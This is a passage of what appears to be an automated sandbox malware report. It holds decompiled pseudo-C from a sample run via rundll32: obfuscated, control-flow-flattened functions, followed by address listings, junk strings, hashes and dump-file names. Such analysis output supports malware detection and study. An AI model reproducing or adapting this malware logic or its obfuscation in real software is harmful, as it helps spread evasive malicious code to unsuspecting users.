				_v1712 = 0x870e;
				_v1712 = _v1712 + 0xffff5ffb;
				_v1712 = _v1712 | 0xdd5f6132;
				_v1712 = _v1712 ^ 0xffffafe6;
				_v1624 = 0x68da;
				_v1624 = _v1624 + 0xffffec61;
				_v1624 = _v1624 ^ 0x00000005;
				_v1760 = 0x29b3;
				_t640 = _v1760;
				_t700 = 0x46;
				_t752 = _t640 % _t700;
				_v1760 = _t640 / _t700;
				_v1760 = _v1760 + 0x8bb3;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00006bff;
				_v1632 = 0x9ea1;
				_v1632 = _v1632 | 0x9159fffd;
				_v1632 = _v1632 ^ 0x91598ff5;
				_v1680 = 0x593f;
				_v1680 = _v1680 + 0xffff5c1c;
				_v1680 = _v1680 >> 0xf;
				_v1680 = _v1680 ^ 0x00019d52;
				_v1620 = 0x376b;
				_v1620 = _v1620 << 7;
				_v1620 = _v1620 ^ 0x000bb580;
				_t644 = E10001D81();
				_t758 = _v1592;
				_t764 = _t644;
				_t680 = _v1592;
				while(1) {
					L1:
					_t645 = 0xbb652cf;
					do {
						while(1) {
							L2:
							_t770 = _t759 - 0x210d0174;
							if(_t770 > 0) {
								break;
							}
							if(_t770 == 0) {
								_v1572 = E100018FE();
								_v1568 = 2 + E1001D52C(_v1736, _v1744, _v1832, _t659, _v1752) * 2;
								_t700 = _t764;
								_t752 = _v1792;
								E100020D7(_t700, _v1792,  &_v1576, _v1620, _v1800, _v1808, _v1736, _v1736, _t764, _v1816, _v1604, _t764, _v1756, _v1824);
								_t765 =  &(_t765[0xf]);
								asm("sbb esi, esi");
								_t760 = _t759 & 0x05909a0f;
								__eflags = _t760;
								L16:
								_t759 = _t760 + 0x2d803f1a;
								while(1) {
									L1:
									_t645 = 0xbb652cf;
									goto L2;
								}
							}
							if(_t759 == 0xa9c154a) {
								_push(_v1628);
								_push(0);
								_push(_t700);
								_push(_v1804);
								_t700 = 0;
								_push(_v1700);
								_t752 = _v1716;
								_push( &_v1564);
								_push(1);
								E1001B0D5(0, _v1716, __eflags);
								_t765 =  &(_t765[7]);
								_t759 = 0x1cb2b1be;
								while(1) {
									L1:
									_t645 = 0xbb652cf;
									goto L2;
								}
							}
							if(_t759 == _t645) {
								_push(_v1732);
								_push(_v1612);
								_push(_v1644);
								E1001BD2C(_t680, __eflags, E1000B871(0x1000111c, _v1600, __eflags), _v1636,  &_v524,  &_v1564, _v1692,  &_v1044, 0x104, _v1820);
								_t752 = _v1812;
								_t700 = _v1772;
								E1000717B(_t700, _v1812, _v1724, _t667, _v1788);
								_t765 =  &(_t765[0xe]);
								_t759 = 0xa9c154a;
								while(1) {
									L1:
									_t645 = 0xbb652cf;
									goto L2;
								}
							}
							if(_t759 == 0x1ae17071) {
								 *((intOrPtr*)(_t758 + 0x34)) = _v1588;
								_t674 =  *0x1002140c; // 0x0
								 *(_t758 + 0x2c) = _t674;
								 *0x1002140c = _t758;
								return _t674;
							}
							if(_t759 == 0x1cb2b1be) {
								_t752 = _v1708;
								_t700 = _v1652;
								E100033F4(_t700, _v1708, _v1676, _v1660, _t680);
								_t765 =  &(_t765[3]);
								_t759 = 0x1d6c6a37;
								while(1) {
									L1:
									_t645 = 0xbb652cf;
									goto L2;
								}
							}
							if(_t759 == 0x1d6c6a37) {
								_t752 = _v1596;
								_t700 = _v1740;
								E100033F4(_t700, _v1596, _v1668, _v1684, _v1584);
								_t765 =  &(_t765[3]);
								_t759 = 0x30e47afb;
								while(1) {
									L1:
									_t645 = 0xbb652cf;
									goto L2;
								}
							}
							if(_t759 != 0x2108acc9) {
								goto L28;
							}
							_t752 = _v1728;
							_t700 = _v1748;
							_t680 = E1000F249(_v1728, _v1764, _v1580, _v1608, _v1584);
							_t765 =  &(_t765[4]);
							_t645 = 0xbb652cf;
							_t759 =  !=  ? 0xbb652cf : 0x1d6c6a37;
						}
						__eflags = _t759 - 0x270f492f;
						if(_t759 == 0x270f492f) {
							_t701 = 0x3c;
							_t758 = E1000A0AD(_t701, _t752);
							_t700 = _t700;
							__eflags = _t758;
							if(_t758 == 0) {
								_t759 = 0x1abcf402;
								_t645 = 0xbb652cf;
								goto L28;
							}
							_t752 = _v1640;
							E1001BA7B(_v1640, _t700, _v1648, _v1688, _t700,  &_v524, _v1696, _v1768);
							_t765 =  &(_t765[7]);
							_t759 = 0x2e2ba405;
							while(1) {
								L1:
								_t645 = 0xbb652cf;
								goto L2;
							}
						}
						__eflags = _t759 - 0x2d803f1a;
						if(_t759 == 0x2d803f1a) {
							return E100033F4(_v1624, _v1760, _v1632, _v1680, _t758);
						}
						__eflags = _t759 - 0x2e2ba405;
						if(_t759 == 0x2e2ba405) {
							_t752 = _v1592;
							E100084D8(_v1588, _v1592, 0x100010bc,  &_v1044);
							asm("sbb esi, esi");
							_pop(_t700);
							_t760 = _t759 & 0xf38cc25a;
							goto L16;
						}
						__eflags = _t759 - 0x30e47afb;
						if(_t759 == 0x30e47afb) {
							_t752 = _v1784;
							E1000ADFC(_v1776, _v1784, _v1576, _v1712);
							_pop(_t700);
							_t759 = 0x1ae17071;
							while(1) {
								L1:
								_t645 = 0xbb652cf;
								goto L2;
							}
						}
						__eflags = _t759 - 0x3310d929;
						if(_t759 != 0x3310d929) {
							goto L28;
						}
						_t752 =  &_v1576;
						_t570 =  &_v1664; // 0xd4e
						_t700 =  *_t570;
						E1001BF69( &_v1576, _v1672, _v1720,  &_v1584);
						_t765 =  &(_t765[3]);
						asm("sbb esi, esi");
						_t759 = (_t759 & 0xf02431ce) + 0x30e47afb;
						goto L1;
						L28:
						__eflags = _t759 - 0x1abcf402;
					} while (__eflags != 0);
					return _t645;
				}
			}

0x1001539f
0x100153a5
0x100153b0
0x100153b8
0x100153c3
0x100153d3
0x100153da
0x100153e3
0x100153ea
0x100153ef
0x100153f5
0x100153fd
0x10015405
0x1001540d
0x10015415
0x1001541a
0x10015422
0x1001542a
0x10015432
0x10015444
0x10015449
0x10015452
0x1001545d
0x10015468
0x10015473
0x1001547e
0x10015489
0x1001549b
0x100154a0
0x100154a9
0x100154b4
0x100154bf
0x100154ce
0x100154d3
0x100154dc
0x100154e7
0x100154f2
0x100154fd
0x10015505
0x10015510
0x1001551c
0x10015521
0x10015527
0x1001552c
0x10015531
0x10015539
0x10015541
0x10015549
0x1001554e
0x10015553
0x1001555b
0x10015563
0x1001556f
0x10015572
0x1001557e
0x10015583
0x10015589
0x10015591
0x10015599
0x100155a3
0x100155a6
0x100155aa
0x100155b2
0x100155ba
0x100155ca
0x100155ce
0x100155d6
0x100155e2
0x100155e7
0x100155ed
0x100155f2
0x100155fa
0x10015602
0x1001560e
0x10015613
0x10015619
0x1001561d
0x10015625
0x1001562d
0x10015639
0x1001563e
0x10015644
0x1001564c
0x10015654
0x1001565c
0x10015664
0x1001566c
0x10015674
0x10015680
0x10015683
0x10015687
0x1001568b
0x10015693
0x1001569b
0x100156a3
0x100156ab
0x100156b8
0x100156bc
0x100156c4
0x100156cf
0x100156d7
0x100156e2
0x100156ea
0x100156f2
0x100156f7
0x100156ff
0x10015707
0x10015711
0x1001571e
0x10015721
0x10015725
0x1001572d
0x10015738
0x10015743
0x1001574e
0x10015759
0x10015764
0x1001576f
0x1001577a
0x10015785
0x10015790
0x1001579b
0x100157a3
0x100157ab
0x100157b3
0x100157bb
0x100157c6
0x100157dc
0x100157e3
0x100157ee
0x100157fa
0x100157ff
0x10015805
0x10015811
0x10015816
0x1001581c
0x10015824
0x10015836
0x1001583b
0x10015844
0x1001584f
0x1001585a
0x10015862
0x1001586d
0x10015878
0x10015880
0x1001588b
0x1001589d
0x100158a2
0x100158ab
0x100158b6
0x100158c6
0x100158cb
0x100158d3
0x100158de
0x100158e9
0x100158f4
0x100158ff
0x1001590a
0x10015915
0x10015920
0x10015932
0x10015935
0x1001593e
0x10015949
0x10015951
0x10015959
0x10015961
0x10015969
0x10015971
0x10015979
0x10015981
0x10015985
0x1001598d
0x10015995
0x1001599d
0x100159a5
0x100159ad
0x100159b2
0x100159ba
0x100159c5
0x100159d0
0x100159d8
0x100159e3
0x100159eb
0x100159f3
0x100159fb
0x10015a03
0x10015a0e
0x10015a19
0x10015a21
0x10015a2c
0x10015a37
0x10015a3f
0x10015a4a
0x10015a55
0x10015a5d
0x10015a65
0x10015a6a
0x10015a72
0x10015a7a
0x10015a8d
0x10015a94
0x10015a9f
0x10015aaa
0x10015ab5
0x10015ac0
0x10015acb
0x10015ad6
0x10015ae1
0x10015aec
0x10015af7
0x10015aff
0x10015b0a
0x10015b15
0x10015b1d
0x10015b28
0x10015b30
0x10015b35
0x10015b3d
0x10015b45
0x10015b50
0x10015b5b
0x10015b66
0x10015b71
0x10015b79
0x10015b84
0x10015b8f
0x10015b97
0x10015ba2
0x10015bad
0x10015bbb
0x10015bbf
0x10015bc4
0x10015bcc
0x10015bd4
0x10015be1
0x10015bed
0x10015bf2
0x10015bf8
0x10015c00
0x10015c08
0x10015c13
0x10015c1e
0x10015c29
0x10015c34
0x10015c3f
0x10015c4a
0x10015c52
0x10015c5a
0x10015c5e
0x10015c5f
0x10015c61
0x10015c65
0x10015c6d
0x10015c72
0x10015c7a
0x10015c85
0x10015c90
0x10015c9b
0x10015ca6
0x10015cb1
0x10015cb9
0x10015cc4
0x10015ccf
0x10015cd7
0x10015cea
0x10015cef
0x10015cf6
0x10015cf8
0x10015cff
0x10015cff
0x10015cff
0x10015d04
0x10015d04
0x10015d04
0x10015d04
0x10015d0a
0x00000000
0x00000000
0x10015d10
0x10015ed0
0x10015efa
0x10015f1f
0x10015f2c
0x10015f31
0x10015f36
0x10015f3b
0x10015f3d
0x10015f3d
0x10015f43
0x10015f43
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015d1c
0x10015e85
0x10015e93
0x10015e95
0x10015e96
0x10015e9a
0x10015e9c
0x10015ea3
0x10015eaa
0x10015eab
0x10015ead
0x10015eb2
0x10015eb5
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015d24
0x10015df9
0x10015e02
0x10015e09
0x10015e5a
0x10015e6b
0x10015e6f
0x10015e73
0x10015e78
0x10015e7b
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015d30
0x10016094
0x10016097
0x1001609c
0x1001609f
0x00000000
0x1001609f
0x10015d3c
0x10015dd9
0x10015de0
0x10015de7
0x10015dec
0x10015def
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015d48
0x10015dad
0x10015db4
0x10015db8
0x10015dbd
0x10015dc0
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015d50
0x00000000
0x00000000
0x10015d6f
0x10015d76
0x10015d7f
0x10015d81
0x10015d8b
0x10015d90
0x10015d90
0x10015f4e
0x10015f54
0x1001602c
0x10016032
0x10016034
0x10016035
0x10016037
0x10016075
0x1001607a
0x00000000
0x1001607a
0x1001605b
0x10016063
0x10016068
0x1001606b
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015f5a
0x10015f60
0x00000000
0x100160c6
0x10015f66
0x10015f6c
0x10015fea
0x10016005
0x1001600d
0x1001600f
0x10016010
0x00000000
0x10016010
0x10015f6e
0x10015f74
0x10015fca
0x10015fd9
0x10015fdf
0x10015fe0
0x10015cff
0x10015cff
0x10015cff
0x00000000
0x10015cff
0x10015cff
0x10015f76
0x10015f7c
0x00000000
0x00000000
0x10015f91
0x10015f9f
0x10015f9f
0x10015fa6
0x10015fab
0x10015fb0
0x10015fb8
0x00000000
0x1001607f
0x1001607f
0x1001607f
0x00000000
0x10015d04

Strings

"W, xrefs: 100155D6
9$~, xrefs: 10016022
xH, xrefs: 100158CB
?Y, xrefs: 10015C9B
uD, xrefs: 100153C3
), xrefs: 10015995
}+, xrefs: 100158D3
$~, xrefs: 10015B1D
XU, xrefs: 100159E3
O, xrefs: 100154BF
)q, xrefs: 10015A5D
0D, xrefs: 100156D7
{^, xrefs: 100154F2
B, xrefs: 10015AEC
bS, xrefs: 100159D8
k7, xrefs: 10015CC4
N9$~, xrefs: 10015F9F
/L, xrefs: 1001584F
s<, xrefs: 10015B79

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: "W$$~$)q$/L$0D$9$~$?Y$N9$~$O$XU$bS$k7$s<$uD$xH${^$}+$)$B
API String ID: 1514166925-754033634
Opcode ID: 1c642ddf70334f4b30349ab5b30cfc7fa10237076ab0b9364ec86fba12688ebf
Instruction ID: 4b9414e838838e2ec5383385bd30fe4a1d99a445d4f4fe88d79e58effda3baa7
Opcode Fuzzy Hash: 1c642ddf70334f4b30349ab5b30cfc7fa10237076ab0b9364ec86fba12688ebf
Instruction Fuzzy Hash: 1F62F2715083819FE374CF25C84AB8BBBE1FB85344F108A1DE5D99A2A0DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10012CE3, Relevance: 21.8, Strings: 17, Instructions: 525
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10012CE3(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				void* __ecx;
				void* _t512;
				signed int _t569;
				intOrPtr _t570;
				intOrPtr _t571;
				signed int _t573;
				intOrPtr _t578;
				void* _t580;
				intOrPtr _t587;
				intOrPtr _t589;
				signed int _t590;
				intOrPtr _t591;
				signed int _t595;
				intOrPtr _t600;
				intOrPtr* _t602;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				intOrPtr _t621;
				void* _t623;
				intOrPtr _t624;
				intOrPtr _t626;
				intOrPtr _t668;
				void* _t670;
				signed int* _t685;
				void* _t690;

				_t602 = _a4;
				_push(_a8);
				_push(_t602);
				_push(__edx);
				E10017B8C(_t512);
				_v16 = 0x5ee29f;
				_t668 = 0;
				_v12 = 0x3cbc62;
				_t685 =  &(( &_v236)[4]);
				_v8 = 0x45a058;
				_v4 = 0;
				_t670 = 0x362f6652;
				_v76 = 0xe2db;
				_t604 = 0x32;
				_v76 = _v76 * 0x7c;
				_v76 = _v76 ^ 0x006d841a;
				_v212 = 0x6eb3;
				_v212 = _v212 / _t604;
				_v212 = _v212 << 0xf;
				_v212 = _v212 + 0xffff4a42;
				_v212 = _v212 ^ 0x011aca46;
				_v72 = 0xa0d9;
				_v72 = _v72 + 0x9429;
				_v72 = _v72 ^ 0x0001b502;
				_v44 = 0x36a8;
				_v44 = _v44 + 0xffffd0ae;
				_v44 = _v44 ^ 0x00000757;
				_v96 = 0x32c6;
				_v96 = _v96 + 0xffffcd0a;
				_v96 = _v96 ^ 0xffffff90;
				_v112 = 0x9784;
				_v112 = _v112 + 0xffff4573;
				_v112 = _v112 + 0x74ab;
				_v112 = _v112 ^ 0xf00051a2;
				_v92 = 0xdb6d;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x00db1e42;
				_v232 = 0x7e9e;
				_t605 = 0x7e;
				_v232 = _v232 / _t605;
				_v232 = _v232 << 2;
				_v232 = _v232 + 0xffff3a93;
				_v232 = _v232 ^ 0xffff0163;
				_v168 = 0xf2c3;
				_v168 = _v168 | 0xd6db62be;
				_v168 = _v168 + 0xffff6f22;
				_t606 = 0x3d;
				_v168 = _v168 * 0x65;
				_v168 = _v168 ^ 0xc48de5b0;
				_v40 = 0x2075;
				_v40 = _v40 / _t606;
				_v40 = _v40 ^ 0x000006c0;
				_v176 = 0xf598;
				_t607 = 0x38;
				_v176 = _v176 / _t607;
				_v176 = _v176 + 0xffffb66b;
				_v176 = _v176 << 0xe;
				_v176 = _v176 ^ 0xeeb32d0c;
				_v100 = 0x5dd7;
				_v100 = _v100 ^ 0x12253627;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x012243c1;
				_v196 = 0x45aa;
				_v196 = _v196 << 9;
				_v196 = _v196 << 0xc;
				_v196 = _v196 + 0xffff6c26;
				_v196 = _v196 ^ 0xb53f7e8b;
				_v28 = 0x6599;
				_v28 = _v28 << 0xd;
				_v28 = _v28 ^ 0x0cb330d8;
				_v152 = 0xe16d;
				_v152 = _v152 ^ 0xb9b23617;
				_t608 = 0x61;
				_v152 = _v152 / _t608;
				_v152 = _v152 ^ 0x01ea6276;
				_v128 = 0x762b;
				_v128 = _v128 + 0xa127;
				_v128 = _v128 + 0x7c7d;
				_v128 = _v128 ^ 0x0001917e;
				_v156 = 0x619c;
				_t609 = 0x46;
				_v156 = _v156 * 0x61;
				_v156 = _v156 + 0x6fe8;
				_v156 = _v156 ^ 0x00251fee;
				_v228 = 0x5afb;
				_v228 = _v228 + 0xffff4790;
				_v228 = _v228 ^ 0x9145963b;
				_v228 = _v228 / _t609;
				_v228 = _v228 ^ 0x0194c371;
				_v52 = 0x390e;
				_v52 = _v52 ^ 0x5b9c2b98;
				_v52 = _v52 ^ 0x5b9c4ce1;
				_v172 = 0x4548;
				_v172 = _v172 >> 0xb;
				_t610 = 0x17;
				_v172 = _v172 * 5;
				_v172 = _v172 ^ 0x0def0e77;
				_v172 = _v172 ^ 0x0def4e18;
				_v84 = 0xb33d;
				_v84 = _v84 ^ 0xe440f93d;
				_v84 = _v84 ^ 0xe4406dc7;
				_v116 = 0xf8a5;
				_v116 = _v116 + 0x9254;
				_v116 = _v116 * 0x13;
				_v116 = _v116 ^ 0x001d2a0c;
				_v124 = 0x4054;
				_v124 = _v124 | 0xded7cd5a;
				_v124 = _v124 * 0x75;
				_v124 = _v124 ^ 0xd8a0c3d2;
				_v200 = 0x4ac3;
				_v200 = _v200 + 0xffff8054;
				_v200 = _v200 + 0xffffeff3;
				_v200 = _v200 + 0xfad9;
				_v200 = _v200 ^ 0x00009635;
				_v132 = 0xefbf;
				_v132 = _v132 / _t610;
				_t611 = 0x1c;
				_v132 = _v132 / _t611;
				_v132 = _v132 ^ 0x00007b9a;
				_v216 = 0x9862;
				_v216 = _v216 + 0xcd8c;
				_t612 = 0x59;
				_v216 = _v216 * 0x6b;
				_v216 = _v216 >> 0xe;
				_v216 = _v216 ^ 0x00007580;
				_v224 = 0x7679;
				_v224 = _v224 | 0x1de9301d;
				_v224 = _v224 / _t612;
				_v224 = _v224 | 0x1a292d9a;
				_v224 = _v224 ^ 0x1a7f2191;
				_v164 = 0xaea;
				_v164 = _v164 >> 0xc;
				_t613 = 0x25;
				_v164 = _v164 / _t613;
				_v164 = _v164 ^ 0x00001e34;
				_v88 = 0x21c7;
				_v88 = _v88 >> 4;
				_v88 = _v88 ^ 0x00002372;
				_v160 = 0xf733;
				_v160 = _v160 >> 2;
				_v160 = _v160 | 0xe557628e;
				_v160 = _v160 ^ 0xe557290b;
				_v80 = 0x201;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x0100c247;
				_v140 = 0xd69e;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 << 9;
				_v140 = _v140 ^ 0x0000101c;
				_v148 = 0x16c0;
				_v148 = _v148 + 0xffff6d7b;
				_v148 = _v148 + 0xffffaffc;
				_v148 = _v148 ^ 0xffff4fe4;
				_v184 = 0x8d1a;
				_v184 = _v184 + 0x4516;
				_v184 = _v184 + 0xa617;
				_v184 = _v184 ^ 0x7b88f180;
				_v184 = _v184 ^ 0x7b89ad1c;
				_v48 = 0xfae0;
				_t614 = 0x3c;
				_v48 = _v48 * 0x4c;
				_v48 = _v48 ^ 0x004a6468;
				_v108 = 0xa52f;
				_v108 = _v108 + 0xffffc18c;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0x00cd3cf9;
				_v56 = 0x1aa4;
				_v56 = _v56 * 0x2f;
				_v56 = _v56 ^ 0x000483de;
				_v60 = 0xcbbf;
				_v60 = _v60 << 4;
				_v60 = _v60 ^ 0x000cd020;
				_v32 = 0xd987;
				_v32 = _v32 / _t614;
				_v32 = _v32 ^ 0x00002152;
				_v68 = 0x4c5a;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x0004a014;
				_v144 = 0xeb70;
				_v144 = _v144 + 0xffffaba9;
				_v144 = _v144 * 0x7e;
				_v144 = _v144 ^ 0x004a6848;
				_v236 = 0x2cd5;
				_v236 = _v236 + 0xa079;
				_v236 = _v236 ^ 0x1ff9cd14;
				_v236 = _v236 | 0x581cc9a3;
				_v236 = _v236 ^ 0x5ffdee5c;
				_v204 = 0x406;
				_v204 = _v204 >> 0xd;
				_t615 = 0x1d;
				_v204 = _v204 * 0x1e;
				_v204 = _v204 / _t615;
				_v204 = _v204 ^ 0x0000165c;
				_v104 = 0x6364;
				_v104 = _v104 >> 4;
				_v104 = _v104 + 0xffffdeba;
				_v104 = _v104 ^ 0xffffa095;
				_v36 = 0x9412;
				_v36 = _v36 ^ 0x8477f2e6;
				_v36 = _v36 ^ 0x84776b75;
				_v188 = 0xad73;
				_v188 = _v188 + 0xffffc193;
				_v188 = _v188 + 0x2da0;
				_v188 = _v188 << 1;
				_v188 = _v188 ^ 0x00010764;
				_v136 = 0xcf63;
				_v136 = _v136 << 9;
				_v136 = _v136 + 0x584d;
				_v136 = _v136 ^ 0x019f5af5;
				_v120 = 0xa224;
				_v120 = _v120 | 0x0ae654b5;
				_v120 = _v120 ^ 0xe905d59f;
				_v120 = _v120 ^ 0xe3e3047c;
				_v180 = 0x9c23;
				_t616 = 0x57;
				_v180 = _v180 / _t616;
				_v180 = _v180 + 0xfabc;
				_t617 = 0x51;
				_v180 = _v180 / _t617;
				_v180 = _v180 ^ 0x00007dc1;
				_v220 = 0x512c;
				_v220 = _v220 >> 9;
				_t618 = 0x4a;
				_v220 = _v220 / _t618;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x00005be7;
				_v64 = 0x9a4f;
				_t619 = 0x3a;
				_v64 = _v64 / _t619;
				_v64 = _v64 ^ 0x000102a9;
				_v208 = 0x28ca;
				_v208 = _v208 | 0x21866eea;
				_v208 = _v208 + 0xffff189b;
				_v208 = _v208 + 0xffff7793;
				_v208 = _v208 ^ 0x2184ff0b;
				_v192 = 0xcc4e;
				_v192 = _v192 << 2;
				_t620 = 0x60;
				_v192 = _v192 * 0x2f;
				_v192 = _v192 / _t620;
				_v192 = _v192 ^ 0x00019019;
				goto L1;
				do {
					while(1) {
						L1:
						_t690 = _t670 - 0x2fc7a808;
						if(_t690 > 0) {
							break;
						}
						if(_t690 == 0) {
							_push(_t620);
							_push(_t620);
							_t624 =  *0x10021fd4; // 0x0
							_t472 = _t624 + 0x24; // 0x24
							_t620 = _v236;
							_t580 = E1000A703(_t620, _v204, _v104, _v36,  *((intOrPtr*)(_t624 + 0x2c)), _t472, _v188, _v212);
							_t685 =  &(_t685[8]);
							if(_t580 != 0) {
								_t668 = 1;
							} else {
								_t670 = 0xc68fc75;
								continue;
							}
						} else {
							if(_t670 == 0x3cdca14) {
								E100033F4(_v168, _v40, _v176, _v100,  *0x10021fd4);
							} else {
								if(_t670 == 0xc68fc75) {
									_t626 =  *0x10021fd4; // 0x0
									_t620 =  *(_t626 + 0x10);
									E1001A5E6(_t620);
									_t685 = _t685 - 0xc + 0xc;
									_t670 = 0x309f0f8a;
									continue;
								} else {
									if(_t670 == 0xe4f59d7) {
										_t587 =  *0x10021fd4; // 0x0
										_t589 =  *0x10021fd4; // 0x0
										_t620 = _v60;
										_t590 = E10018B98(_t620, _v32, _v68, _v44,  *((intOrPtr*)(_t589 + 0x2c)), _v144, _t587 + 0x10, _v76);
										_t685 =  &(_t685[6]);
										asm("sbb esi, esi");
										_t670 = ( ~_t590 & 0xff28987e) + 0x309f0f8a;
										continue;
									} else {
										if(_t670 == 0x2135d019) {
											_push(_t620);
											_t591 =  *0x10021fd4; // 0x0
											_t620 = _v196;
											_t595 = E1001814E(_t620, _v28, _t620, _t620, _v112 | _v96, _t591 + 0x2c, _v152, _v128, _v156);
											_t685 =  &(_t685[8]);
											asm("sbb esi, esi");
											_t670 = ( ~_t595 & 0x2f05871c) + 0x3cdca14;
											continue;
										} else {
											if(_t670 != 0x2b2956b4) {
												goto L23;
											} else {
												_t600 =  *0x10021fd4; // 0x0
												_push(_t620);
												_push(_t620);
												E1001162A(_t620,  *((intOrPtr*)(_t600 + 0x2c)));
												_t685 =  &(_t685[4]);
												_t670 = 0x3cdca14;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						return _t668;
					}
					if(_t670 == 0x309f0f8a) {
						_t621 =  *0x10021fd4; // 0x0
						_t620 =  *(_t621 + 0x20);
						E1001A5E6(_t620);
						_t685 = _t685 - 0xc + 0xc;
						_t670 = 0x2b2956b4;
						goto L23;
					} else {
						if(_t670 == 0x32d35130) {
							_t666 =  *_t602;
							_t620 = _v116;
							_t569 = E10008C0D(_t620,  *_t602, _v124, _t620, _v192 | _v64,  *((intOrPtr*)(_t602 + 4)),  &_v20, _v200,  &_v24, _v72, _v132, _v208, _v216);
							_t685 =  &(_t685[0xb]);
							asm("sbb esi, esi");
							_t670 = ( ~_t569 & 0x0a7f093f) + 0x2b2956b4;
							goto L1;
						} else {
							if(_t670 == 0x35a85ff3) {
								_t570 =  *0x10021fd4; // 0x0
								_t571 =  *0x10021fd4; // 0x0
								_t573 = E1000BDF0(_v224, _v164, _t571 + 0x20, _v20, _v88, _t620, _t620, _v160,  *((intOrPtr*)(_t570 + 0x2c)), _v24);
								_t666 = _v140;
								_t620 = _v80;
								asm("sbb esi, esi");
								_t670 = ( ~_t573 & 0xe3260323) + 0x2b2956b4;
								E1000B6C7(_t620, _v140, _v24, _v148);
								_t685 =  &(_t685[0xa]);
								goto L23;
							} else {
								if(_t670 != 0x362f6652) {
									goto L23;
								} else {
									_t623 = 0x34;
									_t578 = E1000A0AD(_t623, _t666);
									 *0x10021fd4 = _t578;
									_t620 = _t620;
									if(_t578 != 0) {
										_t670 = 0x2135d019;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L23:
				} while (_t670 != 0x3b735277);
				goto L27;
			}

0x10012cea
0x10012cf4
0x10012cfb
0x10012cfc
0x10012cfe
0x10012d03
0x10012d0e
0x10012d10
0x10012d1b
0x10012d1e
0x10012d2b
0x10012d32
0x10012d37
0x10012d4c
0x10012d4f
0x10012d56
0x10012d61
0x10012d71
0x10012d75
0x10012d7a
0x10012d82
0x10012d8a
0x10012d95
0x10012da0
0x10012dab
0x10012db6
0x10012dc1
0x10012dcc
0x10012dd7
0x10012de2
0x10012dea
0x10012df5
0x10012e00
0x10012e0b
0x10012e16
0x10012e21
0x10012e29
0x10012e34
0x10012e40
0x10012e45
0x10012e4b
0x10012e50
0x10012e58
0x10012e60
0x10012e68
0x10012e70
0x10012e7d
0x10012e80
0x10012e84
0x10012e8c
0x10012ea2
0x10012ea9
0x10012eb4
0x10012ec0
0x10012ec3
0x10012ec7
0x10012ecf
0x10012ed4
0x10012edc
0x10012ee9
0x10012ef4
0x10012efc
0x10012f07
0x10012f0f
0x10012f14
0x10012f19
0x10012f21
0x10012f29
0x10012f34
0x10012f3c
0x10012f47
0x10012f4f
0x10012f5d
0x10012f62
0x10012f68
0x10012f70
0x10012f7b
0x10012f86
0x10012f91
0x10012f9c
0x10012fa9
0x10012fac
0x10012fb0
0x10012fb8
0x10012fc0
0x10012fc8
0x10012fd0
0x10012fe0
0x10012fe4
0x10012fec
0x10012ff7
0x10013002
0x1001300d
0x10013015
0x1001301f
0x10013022
0x10013026
0x1001302e
0x10013036
0x10013041
0x1001304c
0x10013057
0x10013062
0x10013075
0x1001307c
0x10013087
0x10013092
0x100130a5
0x100130ac
0x100130b7
0x100130bf
0x100130c7
0x100130cf
0x100130d7
0x100130df
0x100130ef
0x100130f7
0x100130fa
0x100130fe
0x10013106
0x10013110
0x1001311f
0x10013122
0x10013126
0x1001312b
0x10013133
0x1001313b
0x1001314b
0x1001314f
0x10013157
0x1001315f
0x10013167
0x10013170
0x10013175
0x1001317b
0x10013183
0x1001318e
0x10013196
0x100131a1
0x100131a9
0x100131ae
0x100131b6
0x100131be
0x100131c9
0x100131d1
0x100131dc
0x100131e4
0x100131e9
0x100131ee
0x100131f6
0x100131fe
0x10013206
0x1001320e
0x10013216
0x1001321e
0x10013226
0x1001322e
0x10013236
0x1001323e
0x10013251
0x10013252
0x10013259
